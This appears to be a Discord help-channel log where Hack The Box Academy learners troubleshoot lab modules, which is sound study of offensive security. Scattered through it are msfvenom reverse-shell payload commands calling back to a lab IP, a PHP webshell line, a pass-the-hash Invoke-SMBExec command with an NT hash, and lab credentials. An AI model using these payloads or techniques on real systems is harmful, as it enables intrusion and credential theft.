I think it popped up bc people were also having issues with other updated/overhauled modules
I'm playing around in the documenting and reporting lab trying to find a good solution to the terminal output logging. I am using .zsh on kali and tried using the "script" command to log it, which worked, but it gave a really weird output when I opened it anywhere other than the terminal.
How am I supposed to get those clean code blocks with the <SNIP> that are featured in all of the modules?
For instance, I get this doing a searchsploit
When it should look something like this
When I use the cat command it formats it properly, but that would not allow me to pull the unneeded section and insert the <SNIP> portion
Are they that concerned with how we present our data, because I'm used to using just screenshots
Have you tried in tmux?
command is generally sufficient with screenshots
but also if the log is using colors, then a fair bit is because of that
it's pulling bash/zsh color schema which basically wraps text in a color but it uses a code for it
it's the secret sauce magic behind your terminal showing the (user<symbol>hostname) ---
it also looks like there's some other hex magic going on
yeah, it's adding in some hex magic whitespace characters
<0x1B> is the "Escape" key in hex
I have barely ever used tmux before today, and it was not set up for logging, but I will try that at some point and see what the output looks like. I don't have much hope though because when I tried just using tmux in general it was within zsh. tmux is just a multiplexer from what I understand, right? To me that seems like it just wouldn't output anything different than what I am already seeing since it's the same shell
That makes sense!
also the point of logging is so that you can cat it at a later point and screenshot it
No idea. Just a thought.
and to cover your ass if client says you fucked shit up 🙂
I am going to give it a shot later once I'm through the end of the Attacking Enterprise Networks section
Yeah, I feel like at this point I'll log it for good practice with the "script" command as more of a simulated "cover my ass"
tmux is its own terminal with its own shortcuts which takes time to even get used to using
I immediately sort of was put off by it, and that's a personal preference thing
A lot of its features are nice, just not worth the headache for me, personally, to learn how to access and use them -- or configure it to do what I want
Where do they get these templates from? I didn't see a link in the module.
I feel like I've seen these before with a tool that helps you write them and find the score.
¯\_(ツ)_/¯
I mean, the template I believe is also in the report template when you load up the exam
so I don't think it's too big of a deal
https://github.com/Jopp-gh/Obsidian-Dune84/blob/main/Wiki/Tables.md here's an interesting find though
at least for markdown
looks like a bunch of css nonsense to make it work
Interesting, thanks!
check the Documentation & Reporting module, in the Resources
on Attacking SQL Databases I've got the flagDB flag but seems the answer is not correct when I submit, bug?
I got the flag from the DB tb_flag table
From attacking common services?
yes
It should be HTB{!..r}
Try refreshing the page and pasting again and making sure no extra spaces
aha! needed to run sqlcmd without the flags -y 30 -Y 30, cleared now
Hi everyone! could anyone possibly nudge me on the first flag in the sliver skills assessment?
Yeah that limits output size
have you run ||bloodhound||?
hi, anyone please help me in Attacking Web Applications with Ffuf... skills assessment
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
http://faculty.academy.htb:31353/courses/linux-security.php7
I have got this URL but it is still showing incorrect....
im so bored
sounds like it's time to start a new module then
yea
i wanna do smt fun
but besides modules
I kinda wanna figure out my crush's discord password
:)
sounds illegal
lose 2 cubes
who wants to ctf with me?
I know all the hackers here, but the great ones are really few
I can't even verify my email 😢
Reach out to support
Ohoh
I'm also stuck on this if you find a solution please let me know, I've messaged a couple of times in the forum
Dm
@proven swift Dm sent
It was my fault , i put the wrong email
. Thanks for the help
Hi, I am having trouble using the kernel exploit CVE-2020-0668. I am facing this error when I replace the Mozilla Maintenance file with the payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.188 LPORT=7777 -f exe >shell7777.exe
based on the error, it appears to be a 32bit vs 64bit issue. have you tried using a 32bit payload instead?
what is the architecture of the victim box?
I dunno all the other 64bit tools work and when I execute the payload by double clicking it works too
I get a user shell
but i need a system shell with the exploit
msfvenom -p windows/x86/meterpreter/shell_reverse_tcp LHOST=10.10.14.188 LPORT=7777 -f exe >shell7777.exe
Error: invalid payload: windows/x86/meterpreter/shell_reverse_tcp
can you tell me about the payload to use?
the 32-bit one; my notes only have 64-bit stuff
paste this into powershell and tell me what it says
```
if ([IntPtr]::Size -eq 8) {
    Write-Output "64-bit PowerShell"
} else {
    Write-Output "32-bit PowerShell"
}
```
weird. idk then. just try the 32-bit version instead, I guess.
can you tell me the 32-bit payload command? I cannot find it in hacktricks or anywhere
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.188 LPORT=7777 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
will this do?
You should delete this post because it contains spoilers.
Done
I don't know metasploit that intimately; you'd have to search google
How do you suggest I request assistance?
How can i join professional lab Alchemy 
You should be able to infer the answer. You already know who you need to impersonate to gain higher privileges.
yea, I tried looking into hacktricks, they only have 64-bit ones
If you don’t specify it should create 32bit by default
Check the output message after it’s created
If you want to explicitly specify, it's -a x86
I only know cuz I guessed though? What's the method of finding out? Can I DM you? I wanna mention something but can't without spoilers? 😅
Ok
hello guys
Please I have a question!
I started HTB CDSA, but when I got to the Elastic SIEM module, I don't really know what to do to spawn the lab target system and complete the module. Is there anything I need to set to achieve it?
Doesn't the question tell you what to do and where to navigate to Kibana?
the result is same with 32 bit payload
thanks I got the payload
what module
Good morning everyone, I have recently started studying on HTB but I'm a bit lost. Could someone tell me which modules or paths I should study to start practicing Tier 1 on the Start Point?
windows priv escalation module skill assessment 2
I checked the conditions for the exploit it matches what was shown earlier in the module's kernel exploit section
and winpeas confirmed the possibilities of this exploit
i think i see the problem
htb academy or main platform where the machines are to be hacked?
?????
academy, that part that has level 0 to level 3, start point, but now I saw that there are the recommended modules below
I don't think that's academy; can you share the link to the page?
https://academy.hackthebox.com
this is for academy
this is the main ctf platform.
you can try doing the starting point boxes to get yourself familiar with the process of ctf
try giving at least an hour to each machine and if you are still stuck try looking at the walkthroughs
Perhaps the target simply isn't vulnerable to that cve.
yes, I saw that in each layer, at the end of the page there are the recommended modules to go through the phases, I hadn't seen it lol
I dunno what else will work. I tried looking into every section and cross-checking what my privs and options are on this. Then winpeas gave me this, which was mentioned in the module. I double checked the maintenance file, it too matched the criteria and the exploit works, but the payload is giving me the issue
anyways I will look for other paths
thanks for your help tho
nothing can be done if it does not work
sounds like you need to up your power level
yea, it's stupidly low for the progress on the path. I plan to get a membership and do machines to get more XP
but I am on my student membership on this so I gotta finish the path fast
cuz it's gonna expire in a few months
i believe in you, you can definitely power up before your time expires.
thanks
Hi, bros. Can someone help me? I'm at the Password Attacks module and I can't PTH to access David's share folder. When I try mimikatz I get this error: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS
I tried the Invoke module but no luck
generally going to be permission related
I'm logged in as David via RDP
Invoke shows that David can't write in the folder
but it is David's folder, how can he have no perms?
permissions related to the process, not the folder. privilege is a better word for it.
sekurlsa::lsa uses lsass.exe which requires elevated privileges to access
I got your point. But this question is a bit controversial, since the question needs to PTH with David's hash to David's folder
what is the result of whoami /priv
||SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege||
The second is disabled
what section are you on
i'm too exhausted to stay up any longer so if you tell me which section you're on i may be able to provide insight, otherwise i'm going to bed
1638
|| Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "dir" -Verbose
VERBOSE: [+] inlanefreight.htb\david successfully authenticated on DC01
[-] inlanefreight.htb\david does not have Service Control Manager write privilege on DC01||
Invoke shows it
smbexec does not open the user's directory iirc, how do you know what path it will run dir on?
use mini to pth and access the shared folder that way
is the ATTACKING COMMON SERVICES => Attacking FTP Question 1 target machine supposed to show a port with FTP open with a standard scan nmap -sC -sV -p-? I couldn't find it and read in the forum that it's necessary to restart the target several times, is that correct? or is it supposed to not have FTP open?
You do not need to perform full port scan, standard nmap scan should be enough.
Thank you, ok, so the machine seems clearly very buggy as the forum also says, then I have to restart it even more times and wait longer
Hey guys, just wondering if there is any open source tool that primarily focuses on obfuscated script block analysis?
I am doing the Skills Assessment section of Pivoting. I am at the last question where I need to get the flag from the Domain Controller. I have got access to the pivot2 machine. From there, when I try to RDP into the domain controller, I get an error which looks like RDP is not enabled on the Domain Controller. In the module, we learn a lot of techniques where the pivot server is Ubuntu. However, in this case, all the machines are Windows and the options that I can think of are reduced largely. I tried to set up dynamic port-forwarding on the pivot1 machine using plink so that I can perform an nmap scan on the pivot2 machine. But it looks like the pivot2 machine doesn't have SSH enabled, which means plink won't work. For using ptunnel, the pivot host is assumed to be an Ubuntu server, which is not true in this case. SocksOverRDP can be used to create an RDP tunnel. But Proxifier is for desktop applications. And I don't know the proxychains equivalent for Windows
I didn't do that module yet and I don't understand all the details you mentioned, but this comes to mind for me: https://github.com/jpillora/chisel
**Advanced XSS and CSRF module**. STUCK.
- CORS MISCONFIGURATION
qsn: Identify and exploit a CORS misconfiguration to conduct a CSRF attack and exfiltrate the flag.
vhosts needed: **exfiltrate.htb, exploitserver.htb, vulnerablesite.htb**
I don't understand the question. To extract data from http://api.vulnerablesite.com/data (in my case https://api.vulnerablesite.com:PORT) using the CORS misconfiguration, there should be a /data endpoint present on the api site. But in my case there is no such endpoint. Then how do I proceed?
N.B - please correct me if my thinking is wrong.
how should I approach this situation
#modules advanced xss and csrf module
Yes, it did.. but after clicking it didn't show up in the lab
Where exactly do you see that there is a /data endpoint?
SQLMAP ESSENTIALS - Skills Assessment. I am currently doing this section. I already found the injection parameter "id" but I get "connection refused" when I use sqlmap
I didn't see /data in the exercise. I saw that in the page where it teaches us about CORS misconf.
how do I proceed ?
What does that mean
somebody tell me why please?
The spawn target button right there ?
That usually means port closed
anyone with any suggestions?
The module only shows you the method, but doesn't have much in common with the task at the end
"ping" command works
That’s IP
This is port
One layer above
how to step in to complete the task
Module: Broken Authentication Skills Assessment
Looking through the Discord search, it seems like this lab was recently updated. If anyone has completed it recently, could I get a sanity check?
I managed to find valid credentials for ||g----s||, but I'm stuck at the OTP 2FA page. I already brute-forced twice from 0000-9999 and got no hits. I'm running Burp with 5 digits now, but it's taking forever (200,000 attempts, lol). The section about 2FA taught us to use the 4-digit code, so I'm wondering if I'm doing something wrong or if it's perhaps a lab issue?
What exactly did you try and what didn't work? Read the module to understand the method
yes, I did find an endpoint /index.php?first_name.....
this endpoint may be vulnerable. but not getting any flag
Take a look at the whole website.
Try ffuf instead of Burp
not getting anything
oh i see thanks
Thank you. Should I stop the 5 digits attack? I'm at 100.000 mark and I'm afraid of losing progress if that was the intended path D:
I don't know. I have not completed the new module. But Burp Community limits the number of requests. That's why it's taking so long.
I'm using the professional version though, but I will try it with ffuf. Thanks!
Then read the module again carefully. Understand the method and then try to find a vulnerable page
Burp Professional should not actually limit the requests
Yeah, I'm starting to think that brute forcing OTP is not the intended path, neither burp/ffuf works for me. Time to try harder lol
Yes, I clicked it.. then it showed an IP address
I managed to make it work. Feels completely stupid. Thank you very much.
That's your Kibana instance; go to port 5601, you will see it
sorry, I'm re-setting up my PC, can't show you right now
I am studying the file upload module. If anyone needs help, I am happy to assist.
If my annual subscription for HTB Academy ends and I Want to renew it, will my Pentesting path automatically be reset?
Have you accessed the kibana ?
says in thw question type this in the browser
Only modules you didn't complete
Hello, I'm doing the FILE UPLOAD ATTACKS module, Type Filters section. There is a file upload functionality where you can upload a profile pic, so I got stuck, followed the solution and it says "configure burp, send file, take the request that you sent the file to the repeater, delete the content of the file and change the file type to GIF8 and add <?php system('cat /flag.txt'); ?> to the content"
I click send and it says "Only images are allowed"
Despite following the solution step by step, am I doing something wrong?
Thank you for your feedback, I'll check it now.. I should search it on another tab in my browser, right?
in the pwnbox
Or your computer if you have the vpn running
Instance != target
"Start Instance" starts the pwnbox
"Click here to spawn target" spawns the target
Password Attacks > Passwd, Shadow & Opasswd
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
I can SSH into Will. But when I tried to unshadow the passwd and shadow, I got an error.
will is not in the sudoers file. This incident will be reported.
Will has a copy somewhere, and you can transfer files to your attack system
See: File Transfer module if you want to find a method
hmm name is sus
bro only got banned for a day
he's banned already
As I was typing
weird, how I could not get a flag, but same command on pwnbox showed it......
could have spent an eternity trying to figure out why it was not working on my VM
are we allowed to scp content out to the pwn environment if we don't have access to the /etc/shadow for the current user that is already SSH'd in?
Maybe the files are in another directory
That can be accessed by the user
wdym? I tried Kira's credential and SSH'd in, but still having an error, because there is no right to SSH the /etc/shadow out to pwnbox.
What Marcie is trying to tell you is that /etc/shadow is not what you are looking for
Remember to apply every bit of knowledge taught in the module and don't just brute-force everything that stands in your way 🙂 . No need to brute-force the 2FA code 😬
how can I share screenshots?, It's not letting me?
Yes, I've managed to solve it already, thank you!
I got tunnel vision DX been studying nonstop for weeks 😛
Awesome, glad to hear 🙌
Read and follow #welcome
Is there anyone I can ask about kerberos attack module skill assessment last question? I have 2 creds and tgs for kirk
where can I run the VPN connection file?
What are you using? You need a vpn client like openvpn and run the .ovpn file
The pwnbox should be enough for this module since you're just looking through logs
Ok, let me use Open VPN to open the file
In your own environment (e.g. Kali Linux in VirtualBox or VMWare), you’ll download the VPN file from HTB.
In a terminal, run these commands:
cd Downloads
sudo openvpn your_vpn_file.ovpn
Replace “your_vpn_file” with the name of the vpn file you downloaded
So I need to do it from Kali Linux virtual machine.. thank you for the clarification
You’re welcome!!
If you’re running a Linux distro on your host machine, you can also run it from there. But Kali Linux comes pre-installed with many of the tools you’ll be using in these modules, so it’ll be a little easier for you to use that if you’re not very experienced. 🙂
how do I run with Kali, what are needed to be done
To run a Kali Linux virtual machine?
if you're using the pwnbox you don't need to worry about the vpn config file
done it need any connections
it automatically connects to the vpn
☝🏻☝🏻
Pwnbox is really going to be your easiest option if you’re just starting out with this stuff.
and to connect to the HTB VPN it's as simple as: download the VPN file in your VM --> open a terminal --> cd to the directory you downloaded it to --> sudo openvpn <filename>.ovpn (replace <filename> with the appropriate name; for instance, academy is academy-regular.ovpn)
note: don't run the pwnbox and vpn connection at the same time, as you will have a bad time since they will have the same internal tun0 IP; so routing gets messed up and causes collisions
Just did that on my Kali Linux Virtual machine
what do I do next
well towards the bottom you should see Initialization Sequence completed yes?
if so: minimize (DON'T CLOSE) that terminal and open a new terminal
in the new terminal, type ip a and see if you have a tun0 ip
your VPN connection remains while the terminal you ran the sudo openvpn command is open
you should be able to launch a target that has a 10.129.x.x IP and ping it (depending on the module) and even scan with nmap
I can't see the end, I tried to go down, but not letting me.. I think I'll just do the next step
Now I see it, initialisation sequence completed
done, yes
where will I run it?
in the academy page "Click here to spawn target"
Ok
in a NEW terminal
not the same terminal that has the VPN connection
which is why I suggest minimizing. I don't know if Kali has a desktop environment that has workspaces; I use Parrot and have workspace 1 being my VPN connection, and do all my work in workspace 2
so that I don't accidentally close my VPN when cleaning up my terminals between modules
Yes kali has workspaces
should create another workspace?
I recommend it; mostly because it keeps things cleaner
tbh if I had multiple monitors it wouldn't be that big of an issue; but I'm poor
you are not alone my friend!
I also recommend tmux
if you're just starting out, learning tmux isn't bad
I'm just too stuck in the trenches of the terminal that switching was just too much work for me to care enough
I just use i3
!
ok arch user
So now I'm in the HTB page, should I now click "spawn the target system!"?
yep
yes
Damn, no, I use Debian : )
Hi I need a hint on skill assessment 2 for windows privilege escalation task 2
I suggest going over "Introduction to Academy"
I tried CVE-2020-0668
as it teaches how to interact with Academy
it does not work
Ok done, what's the next step?
?
follow the steps given in the module/section to attack it
you should be able to interact with it from your VM
hey, where you stuck at on task 2?
I need to escalate privileges to SYSTEM. I made the payload in both 32- and 64-bit versions and used the exploit to replace mozillaMaintenance; it works, but when I try to start the service I get this error
The question says "Navigate to https://[Target IP]:5601, click on the side navigation toggle, and click on the "Discover". Then, click on the calendar icon, specify "last 15 years", and click on 'Apply'".
how do I go about it
what do you get from the task??
Read the module material it shows screenshot of how to navigate kibana ...
what next?
Ok
just follow the steps, and the rest should follow
to be able to answer the question
hmmm, shouldn't need to use that CVE for that task
we're not here to hold your hand through the section
can do something much simpler imo
I tried to copy the file directly but I do not have priv to replace the maintenance file
can you give a hint?
I tried winpeas it gave me name of the exploit i am using now
I then tried SharpUp nothing much turned up
autoenum tools can give wildly out of scope stuff btw
WinPeas, much like LinPeas looks for everything whether you know how to accomplish it or not
let me try it again
you should see something that is related to installing
ok
I get it
spend so much time I can practically see the output of enumeration in front of me
🙂
so like Marcie said, auto enumeration tools have their place, but you will have to analyze results yourself from many techniques and what you have available
Thanks guys, I appreciate the advice. I will try them now
If you need more help , suggest looking at Miscellaneous Techniques section in the module
In the AD Enumeration & attacks - skills assessment part I when i try to upload chisel to the webshell it fails
i uploaded powerview.ps1 and it works idk why this happens
how are other ppl using chisel and it works tho?
could be that it got corrupted/broken in transit ¯\_(ツ)_/¯
so could be a connection issue
just saying don't solely rely on one tool
ok
If you haven't already do yourself a huge favor and go get familiar with ligolo, makes pivoting a lot easier in most cases. It saved me a ton of time doing the Attacking Enterprise Network module, and then I saw what the module itself recommended and I was even more glad I chose to use Ligolo instead of trying to proxy through MSF lol
why is the flag not working
You should delete this as it contains spoilers, but that's not the flag it's looking for.
i don't know. i didn't write down any notes about the skill assessment, but I can see the answer is totally different than what you got.
the banner
is literally correct i checked on a youtube video
but its giving me that it its wrong
maybe i am looking at the wrong section, you didn't include it
Network Enumeration with Nmap - Nmap Scripting Engine
it's telling me that the banner is wrong when it's literally right
yep that's the one i was looking at. not the flag they're looking for.
but on a YouTube vid it's the same banner
well i say it's not
same banner != right flag
I feel the question is a little tricky, but if your map flags are correct it should get the flag.
I saw the .. but I didn't access it because I didn't think the flag would be there, as the module hasn't included such a skill, but I guess you're meant to use past knowledge from other modules
my bad
So much for that video being correct. 😂
he was just looking at the flag itself to compare not the actual answer i think
Oh
This one tripped me up when I first did it, too. Had to go hunting for scripts that weren’t listed in the course material. Realized the answer was right in front of me the whole time, just didn’t recognize it at first.
Has anyone solved Broken Authentication skills assessment?
Module updated yesterday, if anyone has solved it and can give any tip!
What do you need help with? It helps if you tell more what have you done and where you're stuck at.
This is a tier 2 module - please take the discussion to DM.
Okie! sorry!
sorry, didn't know
gonna delete it just in case
ty
Where can I get a tip/help with zephyr initial foothold?
Read #welcome and register your account, you can ask in #prolabs-zephyr .
Ok thx
I'm new to HTB Academy and this is HARD HARD....lo
welcome to the struggle bus. the journey is hard but very rewarding 
Yes....This is going to take some time.....I'm starting from SCRATCH......100% NOOB..
Don't they have an assistant that helps with the modules?
what modules are you starting with? i think they recently added step by step help for some modules if you have an annual subscription
no. if you bought any of the annual subs, you get the step-by-step solutions for questions
however people are more than willing to help you out if you have any questions
HTB Forums are amazing too
I guess I need more of a detailed explanation 🤔......
Plus I don't want to be in the discord bugging people 😒....lol...but I'm going to do this.....I really need this CERT by August......
why do you need the cert by then?
If you're starting from scratch and having difficulties so far, I think that aiming to get the cert by August is a really hard goal. The course is indeed complex, and each person has their own struggles while doing it. Like many others have already said here in the past, treat it as a marathon and not as a sprint. Otherwise, you will just get frustrated and start hating cybersecurity. The best goal you can aim for is to be better than you were yesterday, and most importantly, don't compare yourself with others.
Thanks. I will fight....and fight...
Perseverance is key. 😉
Currently doing the Broken Authentication module, specifically Brute-Forcing Password Reset Tokens. The section is pretty straightforward explaining how ffuf can be used to bruteforce the reset token. But my question is this: if a password reset token is a one-time use token and we manage to bruteforce it with ffuf, isn't that token now useless since ffuf "used" the token to bruteforce and now the attacker wouldn't be able to use that token to reset someones account?
In a "real" scenario I think you could use Burp suite, and once it finds the correct token, Request in browser → In original session.
@bradleydare ah okay that makes sense appreciate the answer
I'm doing the Windows File Transfers section of the File Transfers module. For question 2 it's telling me to RDP into the target, but when I try to do that it doesn't work:
┌─[us-academy-2]─[10.10.14.180]─[htb-ac-605555@htb-7z07nbnfoa]─[~]
└──╼ [★]$ xfreerdp /v:10.129.203.252 /u:htp-student /p:HTB_@cademy_stdnt!
[01:34:49:273] [73900:73901] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[01:34:49:273] [73900:73901] [WARN][com.freerdp.crypto] - CN = MS02
[01:34:49:474] [73900:73901] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[01:34:49:474] [73900:73901] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[01:34:49:474] [73900:73901] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[01:34:49:474] [73900:73901] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
why won't xfreerdp work when it's telling me to RDP into the target?
can someone help me out here?
try putting single quotes around the password
the password contains special characters, single quotes around it make linux interpret it as a literal string
I need help with Skills Assessment - File Upload Attacks. I found the upload directory, but i can't seem to upload the file with my payload. This is the extension im using 240608_images.phar.jpg.
Hi! just a quick question, I am doing this module as well. Is your webpage loading correctly? I am currently seeing just a normal page with no css plus the form is not filtering or blocking the php file I upload even though it is only allowing images.
That's weird, I can't upload php files
Sounds like your environment is broken. Restart it or try another region.
Thanks!
Finally made progress! Created a script, but then finally transferred files w/o issue. I've got the Admin hash on MS01. That only took 3 days (or was it 4?)
I wish it were sooner, but the script prep was a huge time saver today
Again, thanks all
Hi again, apologies for messaging but I tried switching regions and restarting the environment multiple times but the issue still persists. Kinda weird that the method is also GET when uploading. Will probably skip this for now and hope that it's an isolated issue. Thanks!
You're not bugging anyone by reaching out to get a better understanding. Just don't use discord as a crutch. There are some folks that are only stuck for only a couple minutes and come running in here. Give it some time, getting stuck is the best way to learn (IMHO). Also everyone here wants you to succeed! Not sure which cert you are going for but if it's CPTS, you should set realistic expectations. The course just like the exam is a marathon not a sprint.
AD Trust attacks, I can't seem to get psexec working in the ExtraSids Attack section. I verified I have the correct domain SID, correct extra-sid, correct NTHASH (tried aesKey too). It saves the .ccache file but always says the TGT has been revoked. I'm able to do it with impacket-raiseChild without any issue. Can anyone shed light on what I'm doing wrong?
I'm working through the Easy Lab for the Footprinting module and have hit a wall. I believe I'm looking for SSH keys, but I'm not sure where to find them. I have run nmap on the DNS server discovering that SSH, DNS, and FTP are all open. I can connect to the FTP, but there are no files or directories that I can find there. I can do nothing with SSH because I need the SSH keys for the user credentials given. I ran Nmap on the app server, internal subdomain, mail server, and the two workstations I discovered. I was only able to brute force the internal subdomain and uncovered the vpn, ftp, and ws1 and ws2. I can't connect to either ws1 or ws2. I even tried checking to see if I could connect via SMTP and POP3 to the email server to no avail. Any ideas out there?
In ftp, have you looked around for hidden directory?
I thought about that, but in looking up the FTP commands I didn't see any way to do that, for example ls -a as you can in Linux/Unix to reveal all directories/files
I actually just tested and did find a hidden directory, now I just need to check the directory. Thank you for the suggestion!
If you can't connect to pop3 and you have possible usernames, you can brute force pop3. Also look around on the internal VPN/ftp stuff.
Will do!
you can ls -la in ftp btw
had the same issue dm
Yeah, I ended up trying ls -a and found a few directories, but they seem unnamed. Thank you for letting me know though!
unnamed?
I only get a period or two periods for the name
then you're in the wrong ftp server
Check the other ftp on internal.
enumerate more
Hmm, interesting, okay
Also if it's openvpn config, try reading it.
this server can also be found via digging up records
though, most people get it by way of really good scans
Enumeration is also an art. 
I know when I connect to the ftp it says ftp.int.inlanefreight, which I thought was odd, but just went with it. I did brute force the internal subdomain and found another ftp, which seems like the one I need to connect to
Correct
What's odd about the other one though is the IP is the localhost IP, so I'm not sure how to connect to that
add to /etc/hosts
localhost = local relative to the DNS
Ah, that makes sense
when you query a name server/record server you will always see the results relative to what you query
I haven't dealt much with updating the /etc/hosts file, so I just put the IP, then tab and then the FQDN for the address, right? I'm getting a connection refused error
Are you sure did you put it correctly?
I put the localhost IP, tabbed once, and typed ftp.internal.inlanefreight.htb
Remove ftp from there.
no
Hmm?
I can keep wrestling with this tomorrow. I appreciate your help @fathom pendant & @rustic sage
Hello. I've been trying to spawn the boxes on the "Remote/Reverse Port Forwarding with SSH" Module. It's been 15 minutes already, but the IP isn't showing up. I've tried about 4 or 5 times already, but I'm not getting the target IP. Changed VPN servers also. Should I keep waiting or try something else?
Need to speak to a person? Learn how to reach our support via HTB Labs.
Oh yeah. You are right!
Thanks! I'll try this one.
The Trust Account Attack module provides creds to SSH to the first machine but the credentials are incorrect... Iv downloaded a fresh VPN file. Reset the box. Still incorrect credentials... Is this a bug?
It's listed earlier in the module. I think it's because they use multiple different accounts and those creds that say to RDP in are for the internal network. Try Test@123.
That did it. That's definitely a bug to me. Know where in that section does it say to use Test@123 and the question literally tells you to use the incorrect creds to SSH to the box 😛
Yeah I agree kinda messed up
Hello, is the connection to the lab supposed to be a pain in the ass?
I get disconnected every minute for a minute or two; module Password Attacks, CPTS path. I can't finish the tasks
No it shouldn't. You might have better luck with switching the VPN from UDP to TCP, or connect to a different VPN server all together.
module: Introduction to Windows Evasion Techniques - Skills Assessment I
Hi, does anyone pass the checks but no getting reverse shell? (It working fine when execute it manually - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /U regasm.dll)
I will try, i am using the tiny window tho to perform my attack 🫠
I think you can't attack from two sides 😅 I was using Pwnbox alongside my attack machine!
I disconnected one and it is more stable now:)
Hello, pls, I'm having a challenge with the Windows Defense & Attack section Credentials in Object Properties. I have found the credentials/password of bonnie and tried logging in, which gave me an error due to invalid password, and tried to log in to htb-student to check the target SID of bonnie, but I can't see anything
Hi, I am having difficulties with the PASSWORD ATTACKS module, specifically when attempting to attack the SAM database. Despite numerous combinations I just can't get the right answer. The question I'm struggling with is: Where is the SAM database located in the Windows registry? (Format: *******) The answer I am trying to give is C:\Windows\System32\config\SAM
help me please 
https://learn.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-registry-advanced-users
It’s asking Registry path? Then its listed on this doc
Regrettably, HKEY_LOCAL_MACHINE\SAM is not the correct answer :c
try HKLM\SAM?
Don’t have that module so I’m not sure
Maybe its written in the module material somewhere
Huh
The NT hash of the Administrator user ?
But I see it in the kali screenshot
The one starting with bac
Anyone having a problem with the US servers right now? I can't get my box to spawn.
Hello, I'm trying to do a remote debugging in the module Advanced SQL Injections with the:
student@bb01:/opt/bluebird$ java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=y -jar BlueBird-0.0.1-SNAPSHOT.jar
And I got the error:
2024-06-09T03:32:18.415-04:00 WARN 1428 --- [ main] ConfigServletWebServerApplicationContext : Exception encountered during context initialization - cancelling refresh attempt: org.springframework.context.ApplicationContextException: Failed to start bean 'webServerStartStop'
2024-06-09T03:32:18.421-04:00 INFO 1428 --- [ main] j.LocalContainerEntityManagerFactoryBean : Closing JPA EntityManagerFactory for persistence unit 'default'
2024-06-09T03:32:18.431-04:00 INFO 1428 --- [ main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Shutdown initiated...
2024-06-09T03:32:18.470-04:00 INFO 1428 --- [ main] com.zaxxer.hikari.HikariDataSource : HikariPool-1 - Shutdown completed.
2024-06-09T03:32:18.473-04:00 INFO 1428 --- [ main] o.apache.catalina.core.StandardService : Stopping service [Tomcat]
2024-06-09T03:32:18.503-04:00 INFO 1428 --- [ main] .s.b.a.l.ConditionEvaluationReportLogger :
Error starting ApplicationContext. To display the condition evaluation report re-run your application with 'debug' enabled.
2024-06-09T03:32:18.543-04:00 ERROR 1428 --- [ main] o.s.b.d.LoggingFailureAnalysisReporter :
***************************
APPLICATION FAILED TO START
***************************
Description:
Web server failed to start. Port 8080 was already in use.
Action:
Identify and stop the process that's listening on port 8080 or configure this application to listen on another port.
Is that an expected behaviour?
Did you carry out the attack beforehand as described in the module?
Under the module HTTPS/TLS ATTACKS, Padding Oracles section, for encrypting a custom value, how come you can encrypt your own value with just an encrypted cookie value, like you only provide the encrypted htb-stdnt cookie value to padbuster. Does it mean padbuster will decrypt the htb-stdnt cookie again before encrypting the plaintext value provided?
I am encountering a problem in the module "WORKING WITH IDS/IPS" section "Suricata Fundamentals". I cannot get connected with ssh. Any help would be appreciated.
Hey, I am working on the Attacking LSASS module https://academy.hackthebox.com/module/147/section/1359
Whenever I try to transfer the local file from the target (I followed the steps in the examples), I keep getting this network error message 😦 Am I missing something here?
If you connect with RDP, simply mount a drive as well
😮 how do i do that? >_<
xfreerdp …… /drive:share,"/path/to/your/share"
What exactly is the problem? Without knowing what is not working, nobody can help you here
@acoustic owl I have to upload a webshell to the target but cant find the flag
The question specifies where you can find the flag
I am still getting the network error message 😦
I re-logged into rdp with this drive share command
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.202.149 /drive:share,"/home/htb-ac-900954/Documents/"
and this is my smbserver command:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/htb-ac-900954/Documents/
copy paste lsass using file explorer
when I mount the drive with rdp I usually do /drive:linux,/path/to/share
and when I copy things from the powershell its normally
copy file \\TSCLIENT\linux\file
you can always use net use to check where the share was mounted at.
omg! thank you both! It was much easier using file explorer lol and I noticed that the setting network discovery and file sharing wasn't switched on X_X
I find it easier doing it via terminal because when RDPing to an internal pivot I'm at 900ms lol
have you done skill assessment from shells and payloads module?
yes, a few months ago.
how was your rdp connection
it's the one we need to rdp to a linux attacker box?
yes
iirc this was extremely slow, what I did was upload ligolo to that machine and do it from my host machine
but if you're following the path, you're probably not familiar with pivoting yet. Check out ligolo-ng, it's a wonderful tool and it will save you a lot of time
ok.
still turns out to be a lot of passwords
Hi everyone, need some help. I'm doing the SQLMap Essentials module and I'm on the OS exploitation part. I found the first flag but not the second one.
2nd flag description: **Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.** Can anyone give a hint?
I'm too stubborn for my own good, but I retried to set up a Windows VM like in the "Setting Up" module. I really think my computer is too old because it's laggy and I keep having problems with it. So, do you know any alternative to solve that, or do I have to wait to get a better computer?
Is anyone here to help?
so you have the system shell on the second machine and just need to find the flag?
Hi, about the questions at the File Upload Attacks module: Limited File Uploads
I tried to solve the questions, I created the file with the svg extension with the xml code inside. I uploaded it and visited the page but it wasn't successful. Can anyone help me step by step to solve the two questions please??
